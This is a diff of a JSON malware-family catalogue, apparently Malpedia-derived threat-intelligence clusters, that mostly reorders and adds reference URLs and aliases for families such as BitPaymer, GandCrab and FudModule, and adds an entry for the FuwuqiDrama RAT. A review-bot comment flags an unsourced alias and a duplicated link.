@@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html", "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], - "synonyms": [], + "synonyms": [ + "SHUTTERSPEED" + ], "type": [] }, "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", 
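Review bot: The new synonym `"SHUTTERSPEED"` on the Freenki entry arrives without any reference in the same hunk that uses that name; the `refs` list changes only in order, so a reader cannot tell where the alias comes from. If the alias is documented in one of the existing links that is fine, otherwise add the source, `"<SHUTTERSPEED_SOURCE_URL>"`, to `refs` so the mapping is traceable. While here, the list still carries the same Talos article twice, once as `https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html` and once as `http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html`; that is pre-existing but could be deduplicated in the same change.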
@@ -25213,39 +26367,39 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen", "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", - "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-drake", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", - "https://sites.temple.edu/care/ci-rw-attacks/", - "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", 
"https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", - "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/", + "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", - "http://www.secureworks.com/research/threat-profiles/gold-drake", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/", + "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", 
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", + "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp" + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf" ], "synonyms": [ "BitPaymer", 
@@ -25262,13 +26416,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule",
- "https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf",
- "https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/",
 "https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/",
+ "https://www.mandiant.com/resources/blog/lightshift-and-lightshow",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf",
+ "https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/",
 "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/",
- "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf"
+ "https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf"
+ ],
+ "synonyms": [
+ "LIGHTSHOW"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "49b53f39-3e13-48e7-a2e3-5e173af343b3",
@@ -25292,11 +26449,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
 "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf"
 ],
 "synonyms": [
 "RouterGod"
@@ -25312,10 +26470,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream",
 "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://nao-sec.org/2021/01/royal-road-redive.html",
 "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -25349,13 +26507,26 @@
 "uuid": "5de632a3-bf82-4cef-90fa-e7199fdb932c",
 "value": "FusionDrive"
 },
+ {
+ "description": "FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.\r\n\r\nIt contains two distinguishing hardcoded lists.\r\n\r\nFirst is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012). \r\n\r\nSecond is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.\r\n\r\nFuwuqiDrama stores its configuration in the INI file data\\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi \u2013 the romanized Chinese word for server.\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9284445c-96a8-445d-8e9d-93a093ffbe63",
+ "value": "FuwuqiDrama"
+ },
 {
 "description": "FuxSocy has some similarities to win.cerber but is tracked as its own family for now.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy",
- "http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/"
+ "https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/",
+ "http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html"
 ],
 "synonyms": [],
 "type": []
@@ -25420,21 +26591,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p",
+ "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
 "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
+ "https://nbviewer.org/github/tildedennis/zeusmuseum/blob/master/jupyter_notebooks/gameover/2014-05-28/Gameover%20version%202014-05-28.ipynb",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.lawfareblog.com/what-point-these-nation-state-indictments",
+ "https://www.wired.com/?p=2171700",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
 "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
 "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
 "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf",
- "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "https://www.wired.com/?p=2171700",
- "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
 "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
 "https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "https://www.lawfareblog.com/what-point-these-nation-state-indictments",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf"
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware"
 ],
 "synonyms": [
 "GOZ",
@@ -25473,68 +26645,68 @@
 "value": "Gamotrol"
 },
 {
- "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab’s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.",
+ "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab\u2019s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there\u2019s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://unit42.paloaltonetworks.com/revil-threat-actors/",
- "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/",
+ "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
 "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
- "https://vimeo.com/449849549",
- "https://asec.ahnlab.com/en/41450/",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/",
+ "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
 "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
+ "https://asec.ahnlab.com/en/41450/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/",
+ "https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/",
+ "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
+ "https://unit42.paloaltonetworks.com/revil-threat-actors/",
+ "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/",
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
 "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html",
 "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
- "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
- "https://www.secureworks.com/research/threat-profiles/gold-garden",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/",
- "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
- "http://www.secureworks.com/research/threat-profiles/gold-garden",
- "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/",
- "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html",
- "https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/",
- "http://asec.ahnlab.com/1145",
- "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
- "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
- "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
- "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/",
 "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
- "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
+ "https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "http://www.secureworks.com/research/threat-profiles/gold-garden",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://vimeo.com/449849549",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
- "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/",
- "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind",
+ "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html",
+ "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/",
 "https://isc.sans.edu/diary/23417",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/"
+ "http://asec.ahnlab.com/1145",
+ "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom",
+ "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/",
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
+ "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
+ "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/",
+ "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
+ "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-garden",
+ "https://intel471.com/blog/a-brief-history-of-ta505"
 ],
 "synonyms": [
 "GrandCrab"
@@ -25589,16 +26761,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
- "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html",
- "https://www.youtube.com/watch?v=Pvzhtjl86wc",
+ "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html",
 "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
- "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
 "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/",
- "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
 "https://github.com/eset/malware-ioc/tree/master/turla",
- "https://securelist.com/introducing-whitebear/81638/"
+ "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
+ "https://securelist.com/introducing-whitebear/81638/",
+ "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
+ "https://www.youtube.com/watch?v=Pvzhtjl86wc",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html"
 ],
 "synonyms": [
 "WhiteBear"
@@ -25613,9 +26786,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://bazaar.abuse.ch/browse/signature/GCleaner/",
 "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
- "https://bazaar.abuse.ch/browse/signature/GCleaner/"
+ "https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145"
 ],
 "synonyms": [],
 "type": []
@@ -25711,28 +26885,28 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2",
- "https://www.goggleheadedhacker.com/blog/post/13",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
- "https://github.com/Tera0017/TAFOF-Unpacker",
- "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
- "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/",
- "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
